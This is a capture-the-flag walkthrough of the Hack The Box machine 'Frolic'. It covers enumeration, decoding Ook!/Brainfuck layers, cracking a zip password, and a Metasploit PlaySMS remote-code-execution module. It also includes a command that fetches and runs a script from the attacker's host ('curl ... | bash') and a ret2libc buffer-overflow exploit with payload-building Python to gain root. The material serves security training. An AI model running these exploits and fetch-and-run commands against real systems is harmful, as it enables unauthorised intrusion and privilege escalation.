Produced by | MS08067 Lab (www.ms08067.com)
Author: Da Fangzi (core member of the Ms08067 Lab)
Hack The Box is an online penetration-testing platform built around CTF-style challenges. It helps you sharpen your penetration-testing and black-box testing skills with a continually updated set of machines: some simulate real-world scenarios, others lean towards CTF-style puzzles.
https://www.hackthebox.eu/
The platform hosts many targets, ranging from easy to hard. Every machine you compromise earns points, and there is a hall of fame ranked by score. The target we are testing today is Frolic.
First, scan the target's open ports and services with nmap:
nmap -sV -sT -sC 10.10.10.111
The result:
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-31 14:49 CST
Nmap scan report for 10.10.10.111
Host is up (0.33s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
| 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
9999/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h50m00s, deviation: 3h10m30s, median: -1s
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: frolic
| NetBIOS computer name: FROLIC\x00
| Domain name: \x00
| FQDN: frolic
|_ System time: 2019-03-31T12:20:18+05:30
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-03-31 14:50:18
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.62 seconds
So we have SSH on port 22, SMB on 139 and 445, and HTTP on 9999.
Let's check whether SMB offers anything usable. Here we use smbmap to list the target's shares:
smbmap -H 10.10.10.111
Two shares appear, but we have no access to either.
Let's move on to HTTP.
* Tip: nc -zv IP port is a quick way to check whether a given port on the target is open.
Here, nc -zv 10.10.10.111 1880 gives
10.10.10.111: inverse host lookup failed: Unknown host
(UNKNOWN) [10.10.10.111] 1880 (?) open
where "open" tells us that port 1880 is listening.
Port 9999 serves the default nginx welcome page, with one extra line at the bottom: Thankyou for using nginx. http://forlic.htb:1880
Let's visit 10.10.10.111:1880.
It is the login page of an administrative back end (Node-RED) and asks for a username and password. Common default credentials produce a login-failure message, but with admin:password the page just hangs and never returns any response; I don't know why. On top of that, the lockout after repeated failures makes us wait about ten minutes before trying again, so brute-forcing the credentials is not an option.
Let's enumerate the site's content with gobuster:
gobuster -u http://10.10.10.111:9999 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o fronlic-gobuster.log -t 40
Gobuster turns up several directories (only part of the output is shown); let's look at them directly.
Under /backup there are three entries: password.txt, user.txt and loop/.
Visiting http://10.10.10.111:9999/backup/password.txt
shows: password - imnothuman
Visiting http://10.10.10.111:9999/backup/user.txt
shows: user - admin
So we have a set of credentials: admin:imnothuman
Let's try them on the Node-RED login we saw earlier.
They don't work, so let's try /admin instead.
The page responds with "You have left 2 attempt". Capturing the request in Burp shows nothing useful, but the page's JavaScript source gives the game away: the credentials are hard-coded in it,
a little joke by the box author. Entering admin: superduperlooperpassword_lol on the page
gets us in, to a page full of what looks like gibberish.
It must be some kind of encoding; pasting the text into Google led to this site, which identifies it as the Ook! language:
https://www.dcode.fr/ook-language
Decoding it yields a path. Visiting /asdiSIAJJ0QWE9JAS returns a block of base64 text.
Save it with vim as frolic.bas64 (it contains spaces; strip them with the vim command :%s/ //g).
Base64-decoding it gives binary garbage,
because it is file data rather than text, so write it to a file and check its type:
base64 -d frolic.bas64 > frolic
file frolic
It is a ZIP archive.
Rename it with mv and inspect it with zipinfo:
mv frolic frolic.zip
zipinfo frolic.zip
Trying to extract it shows that the archive is password-protected.
Use zip2john to turn the archive into a crackable password hash, then crack it with john:
zip2john frolic.zip > frolic.zip.hash
john --wordlist=/usr/share/wordlists/rockyou.txt frolic.zip.hash
john frolic.zip.hash --show
Password found: password
Now extract the archive again.
cat shows that index.php consists of hex digits, so let's convert them back to bytes and see:
cat index.php | xxd -r -p
The output is base64, so write it to a file and decode that with base64 (note that the redirected file ends with a newline; strip it before decoding):
cat index.php | xxd -r -p > index.php.b64
The decoded text is yet another encoding, and Google again points at a matching decoder:
Website: https://www.dcode.fr/langage-brainfuck
Decoded result: idkwhatispass
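Both the Ook! blob behind /admin and the Brainfuck hidden in index.php can be decoded offline instead of through dcode.fr. The following Python 3 is an added example and not part of the original write-up: an Ook!-to-Brainfuck translator, a small Brainfuck interpreter, and the hex -> base64 unwrapping that index.php needed. The embedded sample program is constructed for the example (it prints "Hi"); the box's real blobs are not reproduced here.

```python
#!/usr/bin/env python3
"""Offline decoder for the encoding layers met on Frolic: hex -> base64 -> Brainfuck / Ook!.

Added example, not from the original write-up. The sample data below is constructed.
"""
import base64
import re

# Ook! is Brainfuck with each of the eight commands spelled as a pair of "Ook" tokens.
OOK_TO_BF = {
    ("Ook.", "Ook?"): ">", ("Ook?", "Ook."): "<",
    ("Ook.", "Ook."): "+", ("Ook!", "Ook!"): "-",
    ("Ook!", "Ook."): ".", ("Ook.", "Ook!"): ",",
    ("Ook!", "Ook?"): "[", ("Ook?", "Ook!"): "]",
}
BF_TO_OOK = {bf: " ".join(pair) for pair, bf in OOK_TO_BF.items()}


def ook_to_bf(src: str) -> str:
    """Translate Ook! source to Brainfuck; tokens must come in pairs."""
    toks = re.findall(r"Ook[.?!]", src)
    if len(toks) % 2:
        raise ValueError("odd number of Ook tokens")
    return "".join(OOK_TO_BF[(toks[i], toks[i + 1])] for i in range(0, len(toks), 2))


def bf_to_ook(code: str) -> str:
    """Inverse translation; non-command characters are dropped."""
    return " ".join(BF_TO_OOK[c] for c in code if c in BF_TO_OOK)


def run_bf(code: str, stdin: bytes = b"", max_steps: int = 1_000_000) -> str:
    """Minimal Brainfuck interpreter: 8-bit wrapping cells, growable tape, step limit."""
    code = "".join(c for c in code if c in "<>+-.,[]")
    # Pre-match brackets so jumps are O(1) and unbalanced programs are rejected up front.
    jump, stack = {}, []
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ] at {i}")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unmatched [")

    tape, ptr, pc, out, inp, steps = [0], 0, 0, bytearray(), list(stdin), 0
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded (runaway loop?)")
        c = code[pc]
        if c == ">":
            ptr += 1
            if ptr == len(tape):
                tape.append(0)
        elif c == "<":
            if ptr == 0:
                raise IndexError("tape underflow")
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(tape[ptr])
        elif c == ",":
            tape[ptr] = inp.pop(0) if inp else 0
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return out.decode("latin-1")


def decode_hex_base64(blob: str) -> bytes:
    """Undo the two outer layers of index.php: xxd-style hex, then base64 (whitespace ignored)."""
    raw = bytes.fromhex(re.sub(r"\s+", "", blob))
    return base64.b64decode(re.sub(rb"\s+", b"", raw))


def decode_index_php(blob: str) -> str:
    """Full chain used on the box: hex -> base64 -> Brainfuck -> plaintext."""
    return run_bf(decode_hex_base64(blob).decode("latin-1"))


# Constructed sample (not the box's data): a Brainfuck program printing "Hi" (72, then +33 = 105),
# wrapped the way index.php was: base64, then hex broken into lines like xxd output.
SAMPLE_BF = "++++++++[>+++++++++<-]>." + "+" * 33 + "."
_hex = base64.b64encode(SAMPLE_BF.encode()).hex()
SAMPLE_HEX = "\n".join(_hex[i:i + 32] for i in range(0, len(_hex), 32))

if __name__ == "__main__":
    print(ook_to_bf("Ook. Ook? Ook. Ook. Ook! Ook."))
    print(decode_index_php(SAMPLE_HEX))
```

To use it on real data, paste the Ook! text into ook_to_bf() and run the result through run_bf(), or pass the raw content of index.php to decode_index_php(); the step limit guards against a malformed program looping forever.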
That is the end of this trail. We now hold two passwords in total, which suggests there are pages we have not found yet, and that the remaining password belongs to one of them.
So we continue brute-forcing, this time beneath each of the directories found in the first run:
for i in admin dev test backup loop;do gobuster -u http://10.10.10.111:9999/$i -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 150 -o Fronlic-gobuster-$i.log;done
This loop appends each of admin, dev, test, backup and loop to http://10.10.10.111:9999/ and runs gobuster against the result; it takes a while.
Under /dev we find a /backup directory.
Visiting it reveals another path, /playsms, which hosts a PlaySMS login page.
Let's try the password we just obtained there.
The correct credentials: admin:idkwhatispass
Let's check whether PlaySMS has any known exploitable vulnerabilities:
searchsploit playsms
We go straight for the remote code execution vulnerability in version 1.4.
You can read the exploit with searchsploit -x <path> and use it by hand,
or use the module integrated in msf:
msf5 exploit(multi/http/playsms_uploadcsv_exec) > set password idkwhatispass
password => idkwhatispass
msf5 exploit(multi/http/playsms_uploadcsv_exec) > set rport 9999
rport => 9999
msf5 exploit(multi/http/playsms_uploadcsv_exec) > set rhosts 10.10.10.111
rhosts => 10.10.10.111
msf5 exploit(multi/http/playsms_uploadcsv_exec) > set targeturi /playsms
targeturi => /playsms
msf5 exploit(multi/http/playsms_uploadcsv_exec) > set lhost 10.10.15.36
lhost => 10.10.15.36
msf5 exploit(multi/http/playsms_uploadcsv_exec) > run
On success a session is returned,
and we can read the user flag.
Next we need to escalate privileges to root.
We use LinEnum to look for privilege-escalation vectors.
Github: https://github.com/rebootuser/LinEnum
Serve LinEnum.sh from our machine with Python's SimpleHTTPServer module,
then fetch and run it from the shell on the target:
curl http://10.10.15.36:8000/LinEnum.sh | bash
Among the SUID binaries it lists, one stands out: rop, under ayush's home directory (/home/ayush/.binary/rop).
We have execute permission on it,
and it simply takes our input and prints it back.
To analyse it locally, base64-encode it on the target:
base64 rop
copy the encoded text back to our own machine, decode it, make it executable and try it:
base64 -d rop.ba64 > rop
chmod +x rop
./rop hello
Then load it in gdb locally:
gdb rop
We use the peda plugin; installation notes: https://blog.csdn.net/gatieme/article/details/63254211
Feed rop an input 100 characters long (generated with peda's pattern_create).
The result:
the program is killed with SIGSEGV,
because the oversized input overflows the buffer.
Note the faulting address reported at the top: 0x41474141.
Read as a little-endian dword these are the bytes AAGA,
which come from the pattern we just entered.
pattern_offset 0x41474141 computes where in the pattern those bytes sit: 52.
Then use python to output 52 A's
followed by a marker of our own.
The crash address becomes 0x7a666473 (the little-endian reading of the marker bytes "sdfz"),
which confirms that the return address is overwritten right after 52 characters.
Now we need the address of /bin/sh. Rather than the old trick of placing the string in an environment variable, there is a cleaner way: find the offset of /bin/sh inside libc with strings, then add the address libc is loaded at. Both values must come from the target's own libc, since offsets differ between builds, and the base from ldd is only reusable because ASLR is disabled on the target; with ASLR on, it would change on every run.
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
Offset: 0x0015ba0b
Next we need libc's base address, which ldd shows:
ldd rop
Base: 0xb7e19000
Adding the two gives the real address of /bin/sh:
/bin/sh: 0x0015ba0b + 0xb7e19000 = 0xb7f74a0b
Now we need the addresses of system() and exit().
These have to be read with gdb on the target, but the target has no gdb. Download a statically linked build from GitHub, serve it from our machine, fetch it on the target with wget, make it executable and load rop in it:
Github: https://github.com/hugsy/gdb-static/blob/master/gdb-7.10.1-x32
wget http://10.10.15.36:8000/gdb-7.10.1-x32
mv gdb-7.10.1-x32 gdb
chmod +x gdb
./gdb /home/ayush/.binary/rop
then run
(gdb) p system
(gdb) p exit
Write the payload:
#!/usr/bin/env python3
import struct
import sys

buf = b"A" * 52                          # padding up to the saved return address
system = struct.pack("<I", 0xb7e53da0)   # system() on the target, from gdb: p system
exit_ = struct.pack("<I", 0xb7e479d0)    # exit() on the target, from gdb: p exit
shell = struct.pack("<I", 0xb7f74a0b)    # "/bin/sh" inside libc: base + offset

# ret2libc layout: EIP -> system(), system's return address -> exit(), argument -> "/bin/sh"
sys.stdout.buffer.write(buf + system + exit_ + shell)
Upload the exploit to the target and feed its output to rop (the binary takes its input as an argument, as in ./rop hello above) to get a root shell.
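The numbers behind that payload (the offset 52, the /bin/sh address, the byte order of the stack layout) can be reproduced without peda at hand. The following Python 3 is an added example, not the write-up's own script: it rebuilds peda's default cyclic pattern so pattern_offset gives the same answer peda did, resolves a libc symbol from base plus offset, and assembles the 32-bit ret2libc payload while refusing addresses that contain a NUL byte. The addresses are the ones quoted above and are specific to that target's libc mapping; the peda charset is reproduced from peda's source.

```python
#!/usr/bin/env python3
"""Added example (not from the original write-up): peda-compatible pattern_offset,
libc symbol resolution, and ret2libc payload assembly for the rop binary.
"""
import struct

# peda's default "extended" charset: uppercase, lowercase with s/n swapped out for %$-;,
# digits prefixed with sn(), interleaved column by column (reproduced from peda.py).
_UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
_LOWER = "%$-;" + "abcdefghijklmopqrtuvwxyz"
_DIGIT = "sn()" + "0123456789"


def peda_charset() -> str:
    out, k = [], 0
    while True:
        col = "".join(s[k:k + 1] for s in (_UPPER, _LOWER, _DIGIT))
        if not col:
            return "".join(out)
        out.append(col)
        k += 1


def de_bruijn(alphabet: str, n: int, maxlen: int) -> str:
    """First maxlen chars of the De Bruijn sequence B(k, n): every n-gram occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t: int, p: int) -> None:
        if len(seq) >= maxlen:
            return
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    if len(seq) >= maxlen:
                        return
                    seq.append(alphabet[a[j]])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                if len(seq) >= maxlen:
                    return
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(seq)


def pattern_create(size: int) -> bytes:
    """Same output as peda's pattern_create for the default charset."""
    return de_bruijn(peda_charset(), 3, size).encode()


def pattern_offset(crash_value: int, size: int = 0x1000) -> int:
    """Where the 4 bytes that landed in EIP (read little-endian) sit in the pattern, or -1."""
    return pattern_create(size).find(struct.pack("<I", crash_value))


def libc_addr(base: int, offset: int) -> int:
    """ldd gives the mapping base; strings -t x (or readelf) gives the offset inside libc."""
    return base + offset


def p32(value: int) -> bytes:
    return struct.pack("<I", value)


def build_payload(offset: int, system: int, exit_: int, binsh: int) -> bytes:
    """32-bit ret2libc: padding | system() | return address for system (exit) | &"/bin/sh"."""
    payload = b"A" * offset + p32(system) + p32(exit_) + p32(binsh)
    if b"\x00" in payload[offset:]:
        # the binary takes its input from argv; a NUL would cut the payload short
        raise ValueError("an address contains a NUL byte; pick another gadget or offset")
    return payload


if __name__ == "__main__":
    off = pattern_offset(0x41474141)              # 52, as peda reported
    binsh = libc_addr(0xb7e19000, 0x0015ba0b)      # 0xb7f74a0b
    pl = build_payload(off, 0xb7e53da0, 0xb7e479d0, binsh)
    print(off, hex(binsh), len(pl), pl.hex())
```

pattern_create() and pattern_offset() give the same values as peda only for its default (extended) charset; if a different pattern option was used when generating the crashing input, the offset must be taken from the same generator.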
For reprints, please contact the author and cite the source!
Ms08067 Security Lab focuses on popularising network security knowledge and on training. The team has published 《Web Security Attack and Defense: A Practical Guide to Penetration Testing》, 《Intranet Security Attack and Defense: A Practical Guide to Penetration Testing》, 《Python Security Attack and Defense: A Practical Guide to Penetration Testing》, 《Java Code Security Audit (Introduction)》 and other books.
The team's official account regularly shares practical material on CTF ranges, intranet penetration and APT techniques, starting from scratch and grounded in real engagements.
Official website: https://www.ms08067.com/